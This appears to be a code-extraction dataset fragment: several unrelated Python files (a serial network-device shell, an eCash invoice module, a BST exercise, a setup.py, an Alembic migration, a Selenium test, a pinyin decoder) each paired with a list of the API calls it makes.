(894, 911), False, 'from flask import Flask, send_file, send_from_directory, request, jsonify, render_template, abort\n'), ((980, 1005), 'flask.request.args.get', 'request.args.get', (['"""query"""'], {}), "('query')\n", (996, 1005), False, 'from flask import Flask, send_file, send_from_directory, request, jsonify, render_template, abort\n'), ((1044, 1067), 're.sub', 're.sub', (['"""臺"""', '"""台"""', 'query'], {}), "('臺', '台', 
query)\n", (1050, 1067), False, 'import re\n'), ((4396, 4417), 'flask.jsonify', 'jsonify', ([], {'result': 'reply'}), '(result=reply)\n', (4403, 4417), False, 'from flask import Flask, send_file, send_from_directory, request, jsonify, render_template, abort\n'), ((4619, 4649), 'flask.request.get_data', 'request.get_data', ([], {'as_text': '(True)'}), '(as_text=True)\n', (4635, 4649), False, 'from flask import Flask, send_file, send_from_directory, request, jsonify, render_template, abort\n'), ((1153, 1174), 're.search', 're.search', (['"""續"""', 'query'], {}), "('續', query)\n", (1162, 1174), False, 'import re\n'), ((4847, 4857), 'flask.abort', 'abort', (['(400)'], {}), '(400)\n', (4852, 4857), False, 'from flask import Flask, send_file, send_from_directory, request, jsonify, render_template, abort\n'), ((1199, 1225), 're.search', 're.search', (['"""保費|保險費"""', 'query'], {}), "('保費|保險費', query)\n", (1208, 1225), False, 'import re\n'), ((1405, 1427), 're.search', 're.search', (['"""沒有"""', 'query'], {}), "('沒有', query)\n", (1414, 1427), False, 'import re\n'), ((1254, 1275), 're.search', 're.search', (['"""繳"""', 'query'], {}), "('繳', query)\n", (1263, 1275), False, 'import re\n'), ((1452, 1473), 're.search', 're.search', (['"""收"""', 'query'], {}), "('收', query)\n", (1461, 1473), False, 'import re\n'), ((1705, 1727), 're.search', 're.search', (['"""支票"""', 'query'], {}), "('支票', query)\n", (1714, 1727), False, 'import re\n'), ((1502, 1524), 're.search', 're.search', (['"""保費"""', 'query'], {}), "('保費', query)\n", (1511, 1524), False, 'import re\n'), ((1752, 1774), 're.search', 're.search', (['"""抬頭"""', 'query'], {}), "('抬頭', query)\n", (1761, 1774), False, 'import re\n'), ((1896, 1918), 're.search', 're.search', (['"""國外"""', 'query'], {}), "('國外', query)\n", (1905, 1918), False, 'import re\n'), ((1943, 1965), 're.search', 're.search', (['"""收費"""', 'query'], {}), "('收費', query)\n", (1952, 1965), False, 'import re\n'), ((2128, 2150), 're.search', 're.search', 
(['"""保單"""', 'query'], {}), "('保單', query)\n", (2137, 2150), False, 'import re\n'), ((4144, 4158), 'getData.runAIML.runAIML', 'runAIML', (['query'], {}), '(query)\n', (4151, 4158), False, 'from getData.runAIML import runAIML\n'), ((2175, 2198), 're.search', 're.search', (['"""服務員"""', 'query'], {}), "('服務員', query)\n", (2184, 2198), False, 'import re\n'), ((2367, 2390), 're.search', 're.search', (['"""要保人"""', 'query'], {}), "('要保人', query)\n", (2376, 2390), False, 'import re\n'), ((2419, 2441), 're.search', 're.search', (['"""死亡"""', 'query'], {}), "('死亡', query)\n", (2428, 2441), False, 'import re\n'), ((2738, 2760), 're.search', 're.search', (['"""錯誤"""', 'query'], {}), "('錯誤', query)\n", (2747, 2760), False, 'import re\n'), ((2789, 2824), 're.search', 're.search', (['"""姓名|生日|姓別|身分證|資料"""', 'query'], {}), "('姓名|生日|姓別|身分證|資料', query)\n", (2798, 2824), False, 'import re\n'), ((3048, 3077), 're.search', 're.search', (['"""更改|變更|更|改"""', 'query'], {}), "('更改|變更|更|改', query)\n", (3057, 3077), False, 'import re\n'), ((3106, 3130), 're.search', 're.search', (['"""姓名|名"""', 'query'], {}), "('姓名|名', query)\n", (3115, 3130), False, 'import re\n'), ((3280, 3306), 're.search', 're.search', (['"""保費|保險費"""', 'query'], {}), "('保費|保險費', query)\n", (3289, 3306), False, 'import re\n'), ((3335, 3361), 're.search', 're.search', (['"""自動墊繳意願"""', 'query'], {}), "('自動墊繳意願', query)\n", (3344, 3361), False, 'import re\n'), ((3527, 3552), 're.search', 're.search', (['"""職業|工作"""', 'query'], {}), "('職業|工作', query)\n", (3536, 3552), False, 'import re\n'), ((3581, 3611), 're.search', 're.search', (['"""更改|變更|變動|換"""', 'query'], {}), "('更改|變更|變動|換', query)\n", (3590, 3611), False, 'import re\n')]
|
import sys
from context import *
from netautomation import SerialDevice
from netautomation import Handler
PORT = 'COM5'
BAUDRATE = 9600
def main():
device = SerialDevice(PORT, BAUDRATE)
handler = Handler()
handler.bind_device(device)
device.set_credentials('cisco', 'class')
connected = device.connect()
if not connected:
print('Port is closed. Exiting.')
sys.exit()
print('Connection successful.')
try:
while True:
stdin = input('>').strip()
if stdin == '!exit':
handler.execute('exit')
break
stdout = handler.execute(stdin)
print(stdout)
except:
handler.execute('exit')
raise
if __name__ == '__main__':
main()
|
[
"netautomation.Handler",
"netautomation.SerialDevice",
"sys.exit"
] |
[((166, 194), 'netautomation.SerialDevice', 'SerialDevice', (['PORT', 'BAUDRATE'], {}), '(PORT, BAUDRATE)\n', (178, 194), False, 'from netautomation import SerialDevice\n'), ((209, 218), 'netautomation.Handler', 'Handler', ([], {}), '()\n', (216, 218), False, 'from netautomation import Handler\n'), ((404, 414), 'sys.exit', 'sys.exit', ([], {}), '()\n', (412, 414), False, 'import sys\n')]
|
#!/usr/bin/env python3
#
# Electrum ABC - lightweight eCash client
# Copyright (C) 2022 The Electrum ABC developers
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import annotations
import json
from dataclasses import dataclass
from decimal import Decimal
from typing import Dict, List, Optional, Sequence, Union
from urllib.request import urlopen
from .address import Address, AddressError
class InvoiceDataError(Exception):
pass
class Invoice:
def __init__(
self,
address: Address,
amount: Decimal,
label: str = "",
currency: str = "XEC",
exchange_rate: Optional[Union[FixedExchangeRate, ExchangeRateApi]] = None,
):
self.address = address
self.amount = amount
self.currency = currency
self.label = label
if currency.lower() != "xec" and exchange_rate is None:
raise InvoiceDataError("No exchange rate specified for non-XEC amount.")
self.exchange_rate = exchange_rate
def to_dict(self) -> dict:
out = {
"invoice": {
"address": self.address.to_ui_string(),
"label": self.label,
"amount": str(self.amount),
"currency": self.currency,
}
}
if self.exchange_rate is None:
return out
if isinstance(self.exchange_rate, FixedExchangeRate):
out["invoice"]["exchangeRate"] = self.exchange_rate.to_string()
return out
out["invoice"]["exchangeRateAPI"] = self.exchange_rate.to_dict()
return out
@classmethod
def from_dict(cls, data: dict) -> Invoice:
"""Build an invoice from a dict."""
if "invoice" not in data:
raise InvoiceDataError("Missing top-level invoice node.")
invoice = data["invoice"]
currency = invoice.get("currency") or "XEC"
try:
address = Address.from_string(invoice["address"])
except (KeyError, AddressError):
raise InvoiceDataError("Missing or invalid payment address.")
if "exchangeRate" in invoice and "exchangeRateAPI" in invoice:
raise InvoiceDataError(
"Ambiguous exchange rate data (both fixed and API rates are present)"
)
if currency.lower() == "xec" and (
"exchangeRate" in invoice or "exchangeRateAPI" in invoice
):
raise InvoiceDataError(
"Exchange rate must not be specified for XEC amounts"
)
rate = None
if "exchangeRate" in invoice:
rate = FixedExchangeRate(Decimal(invoice["exchangeRate"]))
elif "exchangeRateAPI" in invoice:
rate = ExchangeRateApi(
url=invoice["exchangeRateAPI"].get("url") or "",
keys=invoice["exchangeRateAPI"].get("keys") or [],
)
return Invoice(
address=address,
amount=Decimal(invoice.get("amount", "0.")),
label=invoice.get("label", ""),
currency=currency,
exchange_rate=rate,
)
@classmethod
def from_file(cls, filename: str) -> Invoice:
with open(filename, "r") as f:
data = json.load(f)
return Invoice.from_dict(data)
def get_xec_amount(self) -> Decimal:
if self.exchange_rate is None:
assert self.currency.lower() == "xec"
return self.amount
rate = self.exchange_rate.get_exchange_rate()
assert rate != 0
return self.amount / rate
@dataclass
class FixedExchangeRate:
rate: Decimal
def to_string(self) -> str:
return str(self.rate)
def get_exchange_rate(self) -> Decimal:
return self.rate
@dataclass
class ExchangeRateApi:
"""Data defining an API call to fetch an exchange rate.
The data return by the url is assumed to be JSON, and the keys are used in the
JSON data to find the node containing the exchange rate."""
url: str
keys: List[str]
def to_dict(self) -> Dict[str, Union[str, List[str]]]:
return {"url": self.url, "keys": self.keys}
def get_exchange_rate(self) -> Decimal:
with urlopen(self.url) as response:
body = response.read()
json_data = json.loads(body)
next_node = json_data
for k in self.keys:
next_node = next_node[k]
return Decimal(next_node)
@dataclass
class MultiCurrencyExchangeRateApi:
"""This object is similar to APIExchangeRate, with the notable difference
that both the URL and keys can contain a placeholder string for a currency symbol
(USD, EUR...).
The supported placeholders are "%cur%" and "%CUR%". They are to be replaced
respectively by the lowercase (usd, eur...) and uppercase (USD, EUR...) currency
symbols.
"""
url: str
keys: Sequence[str]
def get_url(self, currency: str) -> str:
"""Get request url with occurrences of %cur% and %CUR% replaced with
respectively lower case or upper case currency symbol.
"""
url = self.url.replace("%cur%", currency.lower())
return url.replace("%CUR%", currency.upper())
def get_keys(self, currency: str) -> List[str]:
"""Get keys with occurrences of %cur% and %CUR% replaced with
respectively lower case or upper case currency symbol.
"""
return [
k.replace("%cur%", currency.lower()).replace("%CUR%", currency.upper())
for k in self.keys
]
def get_exchange_rate(self, currency: str) -> Decimal:
url = self.get_url(currency)
keys = self.get_keys(currency)
return ExchangeRateApi(url, keys).get_exchange_rate()
APIS: List[MultiCurrencyExchangeRateApi] = [
MultiCurrencyExchangeRateApi(
"https://api.coingecko.com/api/v3/simple/price?ids=ecash&vs_currencies=%cur%",
["ecash", "%cur%"],
),
MultiCurrencyExchangeRateApi(
"https://api.coingecko.com/api/v3/coins/ecash?localization=False&sparkline=false",
["market_data", "current_price", "%cur%"],
),
MultiCurrencyExchangeRateApi(
"https://api.binance.com/api/v3/avgPrice?symbol=XECUSDT",
["price"],
),
MultiCurrencyExchangeRateApi(
"https://api.binance.com/api/v3/avgPrice?symbol=XECBUSD",
["price"],
),
]
|
[
"json.load",
"json.loads",
"urllib.request.urlopen",
"decimal.Decimal"
] |
[((5454, 5472), 'decimal.Decimal', 'Decimal', (['next_node'], {}), '(next_node)\n', (5461, 5472), False, 'from decimal import Decimal\n'), ((4272, 4284), 'json.load', 'json.load', (['f'], {}), '(f)\n', (4281, 4284), False, 'import json\n'), ((5236, 5253), 'urllib.request.urlopen', 'urlopen', (['self.url'], {}), '(self.url)\n', (5243, 5253), False, 'from urllib.request import urlopen\n'), ((5326, 5342), 'json.loads', 'json.loads', (['body'], {}), '(body)\n', (5336, 5342), False, 'import json\n'), ((3659, 3691), 'decimal.Decimal', 'Decimal', (["invoice['exchangeRate']"], {}), "(invoice['exchangeRate'])\n", (3666, 3691), False, 'from decimal import Decimal\n')]
|
# Given a sorted (increasing order) array with unique integer elements, write an algorithm to create a binary search tree with minimal height.
from utils import Node
def minimal_tree(arr):
    """Build a minimal-height binary search tree from a sorted list of
    unique integers.

    The middle element becomes the root; the sub-lists to its left and
    right are built recursively into the left and right subtrees.

    Returns the root Node, or None for an empty list.
    """
    if not arr:
        return None
    mid = len(arr) // 2
    root = Node(arr[mid])
    root.left = minimal_tree(arr[:mid])
    root.right = minimal_tree(arr[mid + 1:])
    # Fix: return the Node itself.  The original returned ``current.value``,
    # so every recursive call stored a bare value (not a subtree) in
    # left/right, destroying the tree structure.
    return root
# Smoke test: build a tree from 15 sorted ints and print whatever
# minimal_tree returns for the root.
tester = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]
print(minimal_tree(tester))
|
[
"utils.Node"
] |
[((281, 295), 'utils.Node', 'Node', (['arr[mid]'], {}), '(arr[mid])\n', (285, 295), False, 'from utils import Node\n')]
|
import os
from setuptools import setup, find_packages
# Utility function to read the README file.
# Used for the long_description. It's nice, because now 1) we have a top level
# README file and 2) it's easier to type in the README file than to put a raw
# string in below ...
def read(fname):
    """Return the contents of *fname*, resolved relative to this file's
    directory (used for the long_description README).

    Fix: the original leaked the file handle (``open(...).read()`` with no
    close); a ``with`` block now closes it deterministically.
    """
    with open(os.path.join(os.path.dirname(__file__), fname)) as fh:
        return fh.read()
# Register the setlr distribution with setuptools.  All metadata values are
# identical to the original call; only the call style (PEP 8 keyword
# formatting, grouped requirement list) differs.
setup(
    name="setlr",
    version="0.2.16",
    author="<NAME>",
    author_email="<EMAIL>",
    description="setlr is a tool for Semantic Extraction, Transformation, and Loading.",
    license="Apache License 2.0",
    keywords="rdf semantic etl",
    url="http://packages.python.org/setlr",
    packages=["setlr"],
    long_description=(
        "SETLr is a tool for generating RDF graphs, including named graphs, "
        "from almost any kind of tabular data."
    ),
    include_package_data=True,
    install_requires=[
        "future",
        "pip>=9.0.0",
        "cython",
        "numpy",
        "rdflib>=6.0.0",
        "pandas>=0.23.0",
        "requests",
        "toposort",
        "beautifulsoup4",
        "jinja2",
        "lxml",
        "six",
        "xlrd",
        "ijson",
        "requests-testadapter",
        "python-slugify",
    ],
    entry_points={
        "console_scripts": ["setlr=setlr:main"],
    },
    classifiers=[
        "Development Status :: 5 - Production/Stable",
        "Topic :: Utilities",
        "License :: OSI Approved :: Apache Software License",
    ],
)
|
[
"os.path.dirname",
"setuptools.setup"
] |
[((368, 1277), 'setuptools.setup', 'setup', ([], {'name': '"""setlr"""', 'version': '"""0.2.16"""', 'author': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'description': '"""setlr is a tool for Semantic Extraction, Transformation, and Loading."""', 'license': '"""Apache License 2.0"""', 'keywords': '"""rdf semantic etl"""', 'url': '"""http://packages.python.org/setlr"""', 'packages': "['setlr']", 'long_description': '"""SETLr is a tool for generating RDF graphs, including named graphs, from almost any kind of tabular data."""', 'include_package_data': '(True)', 'install_requires': "['future', 'pip>=9.0.0', 'cython', 'numpy', 'rdflib>=6.0.0',\n 'pandas>=0.23.0', 'requests', 'toposort', 'beautifulsoup4', 'jinja2',\n 'lxml', 'six', 'xlrd', 'ijson', 'requests-testadapter', 'python-slugify']", 'entry_points': "{'console_scripts': ['setlr=setlr:main']}", 'classifiers': "['Development Status :: 5 - Production/Stable', 'Topic :: Utilities',\n 'License :: OSI Approved :: Apache Software License']"}), "(name='setlr', version='0.2.16', author='<NAME>', author_email=\n '<EMAIL>', description=\n 'setlr is a tool for Semantic Extraction, Transformation, and Loading.',\n license='Apache License 2.0', keywords='rdf semantic etl', url=\n 'http://packages.python.org/setlr', packages=['setlr'],\n long_description=\n 'SETLr is a tool for generating RDF graphs, including named graphs, from almost any kind of tabular data.'\n , include_package_data=True, install_requires=['future', 'pip>=9.0.0',\n 'cython', 'numpy', 'rdflib>=6.0.0', 'pandas>=0.23.0', 'requests',\n 'toposort', 'beautifulsoup4', 'jinja2', 'lxml', 'six', 'xlrd', 'ijson',\n 'requests-testadapter', 'python-slugify'], entry_points={\n 'console_scripts': ['setlr=setlr:main']}, classifiers=[\n 'Development Status :: 5 - Production/Stable', 'Topic :: Utilities',\n 'License :: OSI Approved :: Apache Software License'])\n", (373, 1277), False, 'from setuptools import setup, find_packages\n'), ((325, 350), 'os.path.dirname', 
'os.path.dirname', (['__file__'], {}), '(__file__)\n', (340, 350), False, 'import os\n')]
|
from os import listdir
from os.path import join
import ijson
from brix.settings import *
# Flatten BRIX detection hits from per-day JSON dumps in DIR into a single
# CSV.  All runtime settings (CSV, DELIMITER, QUOTECHAR, QUOTING, COLUMNS,
# DIR, CREDOCUT and the csv module itself) come from ``brix.settings``.
#
# Fixes: the output handle previously leaked if any iteration raised (plain
# open/close); the input handle was bound to the name ``json``, shadowing
# the common module name.
with open(CSV, 'w') as csv_file:
    writer = csv.writer(csv_file, delimiter=DELIMITER, quotechar=QUOTECHAR, quoting=QUOTING)
    writer.writerow(COLUMNS)
    jsons = [f for f in listdir(DIR) if f.endswith('.json')]
    count = len(jsons)
    for i, fn in enumerate(sorted(jsons), start=1):
        print('Open file: %s (%d of %d)...' % (fn, i, count))
        path = join(DIR, fn)
        with open(path, 'r') as source:
            # Stream the detections array; files may be too large for json.load.
            objects = ijson.items(source, 'detections.item')
            j = 0
            for o in objects:
                j += 1
                if j % 10000 == 0:
                    print('...processed %d hits' % j)
                user_id = o.get('user_id')
                # Keep only hits from the CREDOCUT user.
                if int(user_id) != CREDOCUT:
                    continue
                row = [o.get(c) for c in COLUMNS]
                writer.writerow(row)
                print('...save BRIX hit from %d device' % o.get('device_id'))
            print('...finish of %s, processed %d hits' % (fn, j))
|
[
"ijson.items",
"os.path.join",
"os.listdir"
] |
[((421, 434), 'os.path.join', 'join', (['DIR', 'fn'], {}), '(DIR, fn)\n', (425, 434), False, 'from os.path import join\n'), ((254, 266), 'os.listdir', 'listdir', (['DIR'], {}), '(DIR)\n', (261, 266), False, 'from os import listdir\n'), ((484, 520), 'ijson.items', 'ijson.items', (['json', '"""detections.item"""'], {}), "(json, 'detections.item')\n", (495, 520), False, 'import ijson\n')]
|
"""machine events
Revision ID: 203f6105a16b
Revises: 5ff7c035ac37
Create Date: 2018-02-08 04:05:47.857990
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '203f6105a16b'
down_revision = '5ff7c035ac37'
branch_labels = None
depends_on = None
def upgrade():
    """Create the ``machine_event`` audit table and attach console tokens to
    machines via a new ``console_token.machine_id`` foreign key."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('machine_event',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('machine_id', sa.Integer(), nullable=True),
    sa.Column('user_id', sa.Integer(), nullable=True),
    # username is stored denormalized alongside user_id.
    sa.Column('username', sa.String(), nullable=True),
    sa.Column('date', sa.DateTime(), nullable=False),
    sa.Column('event_type', sa.Integer(), nullable=False),
    # Free-form event payload (PostgreSQL JSONB).
    sa.Column('info', postgresql.JSONB(), nullable=True),
    # Deleting a machine removes its events; deleting a user keeps them
    # (user_id is nulled out).
    sa.ForeignKeyConstraint(['machine_id'], ['machine.id'], ondelete='CASCADE'),
    sa.ForeignKeyConstraint(['user_id'], ['user.id'], ondelete='SET NULL'),
    sa.PrimaryKeyConstraint('id')
    )
    op.add_column('console_token', sa.Column('machine_id', sa.Integer(), nullable=True))
    op.create_foreign_key(None, 'console_token', 'machine', ['machine_id'], ['id'], ondelete='CASCADE')
    # ### end Alembic commands ###
def downgrade():
    """Revert the migration: drop the console_token FK and column, then the
    ``machine_event`` table."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_constraint(None, 'console_token', type_='foreignkey')
    op.drop_column('console_token', 'machine_id')
    op.drop_table('machine_event')
    # ### end Alembic commands ###
|
[
"alembic.op.drop_table",
"sqlalchemy.DateTime",
"alembic.op.create_foreign_key",
"sqlalchemy.PrimaryKeyConstraint",
"alembic.op.drop_constraint",
"alembic.op.drop_column",
"sqlalchemy.dialects.postgresql.JSONB",
"sqlalchemy.ForeignKeyConstraint",
"sqlalchemy.String",
"sqlalchemy.Integer"
] |
[((1140, 1244), 'alembic.op.create_foreign_key', 'op.create_foreign_key', (['None', '"""console_token"""', '"""machine"""', "['machine_id']", "['id']"], {'ondelete': '"""CASCADE"""'}), "(None, 'console_token', 'machine', ['machine_id'], [\n 'id'], ondelete='CASCADE')\n", (1161, 1244), False, 'from alembic import op\n'), ((1364, 1425), 'alembic.op.drop_constraint', 'op.drop_constraint', (['None', '"""console_token"""'], {'type_': '"""foreignkey"""'}), "(None, 'console_token', type_='foreignkey')\n", (1382, 1425), False, 'from alembic import op\n'), ((1430, 1475), 'alembic.op.drop_column', 'op.drop_column', (['"""console_token"""', '"""machine_id"""'], {}), "('console_token', 'machine_id')\n", (1444, 1475), False, 'from alembic import op\n'), ((1480, 1510), 'alembic.op.drop_table', 'op.drop_table', (['"""machine_event"""'], {}), "('machine_event')\n", (1493, 1510), False, 'from alembic import op\n'), ((854, 929), 'sqlalchemy.ForeignKeyConstraint', 'sa.ForeignKeyConstraint', (["['machine_id']", "['machine.id']"], {'ondelete': '"""CASCADE"""'}), "(['machine_id'], ['machine.id'], ondelete='CASCADE')\n", (877, 929), True, 'import sqlalchemy as sa\n'), ((935, 1005), 'sqlalchemy.ForeignKeyConstraint', 'sa.ForeignKeyConstraint', (["['user_id']", "['user.id']"], {'ondelete': '"""SET NULL"""'}), "(['user_id'], ['user.id'], ondelete='SET NULL')\n", (958, 1005), True, 'import sqlalchemy as sa\n'), ((1011, 1040), 'sqlalchemy.PrimaryKeyConstraint', 'sa.PrimaryKeyConstraint', (['"""id"""'], {}), "('id')\n", (1034, 1040), True, 'import sqlalchemy as sa\n'), ((480, 492), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (490, 492), True, 'import sqlalchemy as sa\n'), ((539, 551), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (549, 551), True, 'import sqlalchemy as sa\n'), ((594, 606), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (604, 606), True, 'import sqlalchemy as sa\n'), ((650, 661), 'sqlalchemy.String', 'sa.String', ([], {}), '()\n', (659, 661), True, 
'import sqlalchemy as sa\n'), ((701, 714), 'sqlalchemy.DateTime', 'sa.DateTime', ([], {}), '()\n', (712, 714), True, 'import sqlalchemy as sa\n'), ((761, 773), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (771, 773), True, 'import sqlalchemy as sa\n'), ((814, 832), 'sqlalchemy.dialects.postgresql.JSONB', 'postgresql.JSONB', ([], {}), '()\n', (830, 832), False, 'from sqlalchemy.dialects import postgresql\n'), ((1106, 1118), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (1116, 1118), True, 'import sqlalchemy as sa\n')]
|
# -*- coding: utf-8 -*-
# @Time : 2022/3/19 8:17 上午
# @Author : Kevin
# @File : search_test.py
# @Software: PyCharm
from selenium import webdriver
import pytest
import time
key_words = ["Hogwarts"]
class TestSearch:
    """Selenium smoke test: search Baidu for each keyword and check that it
    appears in the result page source."""

    def setup(self):
        """Record the start time and launch a Chrome driver for each test."""
        self.start_time = time.time()
        chromedriver = "auto_web/driver/chromedriver"
        self.driver = webdriver.Chrome(executable_path=chromedriver)

    @pytest.mark.parametrize("search_key", key_words, ids=[f"搜寻_{i}" for i in key_words])
    def test_search(self, search_key):
        """Type *search_key* into Baidu and assert it shows up in the results."""
        # Fix: the original URL "https:www.baidu.com/" was missing the "//"
        # authority separator, so the browser could not resolve the host.
        self.driver.get("https://www.baidu.com/")
        self.driver.find_element_by_id("kw").send_keys(search_key)
        self.driver.find_element_by_id("su").click()
        result = self.driver.page_source
        assert search_key in result

    def teardown(self):
        # Report the wall-clock duration of the case, then release the browser.
        print("本次case的使用时间:", time.time() - self.start_time)
        self.driver.quit()
|
[
"pytest.mark.parametrize",
"selenium.webdriver.Chrome",
"time.time"
] |
[((408, 496), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""search_key"""', 'key_words'], {'ids': "[f'搜寻_{i}' for i in key_words]"}), "('search_key', key_words, ids=[f'搜寻_{i}' for i in\n key_words])\n", (431, 496), False, 'import pytest\n'), ((267, 278), 'time.time', 'time.time', ([], {}), '()\n', (276, 278), False, 'import time\n'), ((355, 401), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ([], {'executable_path': 'chromedriver'}), '(executable_path=chromedriver)\n', (371, 401), False, 'from selenium import webdriver\n'), ((846, 857), 'time.time', 'time.time', ([], {}), '()\n', (855, 857), False, 'import time\n')]
|
import json
import math
import sys
from config import config
from loaddict import load_dict
# Beam width: number of candidate sentences kept per step / returned.
TOP_K = 5

# Model tables loaded once at import time.  Names suggest: pinyin ->
# candidate chars, char frequencies, char-transition probabilities,
# char -> pinyin emission probabilities, bigram frequencies and trigram
# counts (triple=True also loads the trigram table) — confirm in loaddict.
pinyin_dic, freq_dict, trans_dict, emit_dict, bi_freq_dict, trip_dict = load_dict(
    triple=True)
def get_value_one_wrap(Dict, key, default_val=1e-40):
    """Look up *key* in *Dict*, falling back to *default_val* when absent."""
    return Dict.get(key, default_val)
def get_value_two_wrap(Dict, firstkey, secndkey, default_val=1e-150):
    """Two-level lookup ``Dict[firstkey][secndkey]`` with graduated fallbacks.

    A missing *firstkey* yields *default_val*; when the first level exists,
    the second key is resolved through get_value_one_wrap (whose own 1e-40
    default then applies).  Works for both the transition and the emission
    tables.
    """
    if firstkey in Dict:
        return get_value_one_wrap(Dict[firstkey], secndkey)
    return default_val
def score_triple(Dict, bichars, thirdchar):
    """Score *thirdchar* following the two-character context *bichars*.

    Backs off to the bigram transition probability (with a penalty) when
    the trigram table has no entry.  The special key ``'bifreq'`` returns
    the raw bigram frequency of the context instead of a trigram score.
    """
    if bichars not in Dict:
        # Unknown context: heavy-penalty bigram backoff.
        return get_value_two_wrap(trans_dict, bichars[1], thirdchar) * 1e-25
    if thirdchar == 'bifreq':
        return bi_freq_dict[bichars]
    if thirdchar not in Dict[bichars]:
        # Known context, unseen continuation: light-penalty bigram backoff.
        return 0.1 * (get_value_two_wrap(trans_dict, bichars[1], thirdchar))
    return get_value_two_wrap(Dict, bichars, thirdchar)
def triviterbi(List):
    """Second-order (trigram) Viterbi beam search over the pinyin syllables
    in *List*.

    Returns a list ``V`` of per-position dicts; ``V[i]`` maps a
    two-character state (the chars chosen for positions i-1 and i) to up to
    TOP_K ``(path, log_score)`` tuples.  Layer 0 is intentionally empty.
    Returns None for inputs shorter than two syllables.
    """
    # because we need to use List[0] and List[1] in the following, make sure
    # length >= 2
    if len(List) < 2:
        print('single pinyin input')
        return None
    V = list()
    for _ in range(len(List)):
        V.append(dict())
    prelist = pinyin_dic[List[0]]
    curlist = pinyin_dic[List[1]]
    # Initialise layer 1: every (first char, second char) pair is a state.
    for curchar in curlist:
        for prechar in prelist:
            V[1][prechar + curchar] = list()
            # the 0 layer is left empty
            # V[][] is used for storing path and its score
            # multiply the score of triple(means the frequency of bi-chars)
            # with the transition probability between first and second char
            score = math.log(score_triple(trip_dict, prechar + curchar, 'bifreq')) + \
                math.log(get_value_two_wrap(trans_dict, prechar, curchar))
            path = [prechar, curchar]
            # V[1][prechar + curchar] = list()
            V[1][prechar + curchar].append((path, score))
    for layer in range(2, len(List)):
        # first layer in the consecutive 3 layers
        fstlayer = prelist
        prelist = curlist
        curlist = pinyin_dic[List[layer]]
        for curnode in curlist:
            topK = list()
            for sndnode in prelist:
                V[layer][sndnode + curnode] = list()
                waitinglist = list()
                for fstnode in fstlayer:
                    # loop over the candidate nodes
                    try:
                        # Extend each surviving path with curnode: previous
                        # score + trigram transition + (1.5x weighted)
                        # emission log-probability of the observed pinyin.
                        for i in range(0, len(V[layer - 1][fstnode + sndnode])):
                            score = V[layer - 1][fstnode + sndnode][i][1] + \
                                math.log(score_triple(trip_dict, fstnode + sndnode, curnode)) + \
                                1.5 * \
                                math.log(get_value_two_wrap(
                                    emit_dict, curnode, List[layer]))
                            waitinglist.append(
                                (V[layer-1][fstnode + sndnode][i][0], fstnode+sndnode, score))
                    except Exception as e:
                        print(e)
            # high scores first
            # NOTE(review): this pruning block is indented OUTSIDE the
            # ``for sndnode`` loop, so only the LAST sndnode's waitinglist
            # is sorted and only V[layer][last_sndnode + curnode] is filled.
            # That looks unintentional — verify against the author's intent.
            topK = sorted(
                waitinglist, key=lambda elem: elem[2], reverse=True)
            for i in range(0, min(len(topK), TOP_K)):
                # append path + its_score
                newpath = topK[i][0].copy()
                newpath.append(curnode)
                V[layer][sndnode + curnode].append((newpath, topK[i][2]))
    return V
def trisearch(V, List):
    """Collect the final-layer paths from the Viterbi table *V* and return
    the best candidate sentences.

    Returns up to TOP_K ``(sentence, log_score)`` tuples, best first.  For
    inputs shorter than two syllables a placeholder result is returned.
    """
    if len(List) < 2:
        return [('Too short pinyin', 0)]
    possibles = list()
    for key in V[-1]:
        for item in V[-1][key]:
            possibles.append(item)
    sorted_path_score = sorted(
        possibles, key=lambda item: item[1], reverse=True)
    ResK = list()
    # Fix: clamp to the number of surviving paths; ``range(TOP_K)`` raised
    # IndexError whenever fewer than TOP_K candidates existed.
    for i in range(min(TOP_K, len(sorted_path_score))):
        charline = ''.join(sorted_path_score[i][0])
        ResK.append((charline, sorted_path_score[i][1]))
    return ResK
'''
print('Loaded, please input...')
line = 'wo ai zu guo'
line = line.replace("\n", "")
line = line.replace("qv", "qu")
line = line.replace("xv", "xu")
line = line.replace("jv", "ju")
line = line.lower()
pyl = line.split()
chinese = trisearch(triviterbi(pyl), pyl)
print(chinese)
print('please input pinyin line\n')
s = ''
while s != 'exit':
s = input()
if s == 'exit':
sys.exit(0)
try:
s = s.replace('\n', '')
s = s.strip()
s = s.lower()
s = s.split()
print(trisearch(triviterbi(s), s))
except:
print('again')
sys.exit(0)
'''
|
[
"loaddict.load_dict"
] |
[((188, 210), 'loaddict.load_dict', 'load_dict', ([], {'triple': '(True)'}), '(triple=True)\n', (197, 210), False, 'from loaddict import load_dict\n')]
|
import unittest
import numpy as np
import pandas as pd
import os
import pytz
from clairvoyant import History
